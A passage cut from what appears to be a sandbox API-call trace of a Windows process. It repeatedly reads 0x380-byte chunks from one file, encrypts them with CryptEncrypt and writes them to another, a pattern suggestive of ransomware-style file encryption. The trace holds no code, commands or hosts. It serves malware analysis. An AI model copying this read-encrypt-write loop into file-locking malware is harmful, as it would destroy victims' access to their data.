nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.820] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.821] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.822] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.824] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.827] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 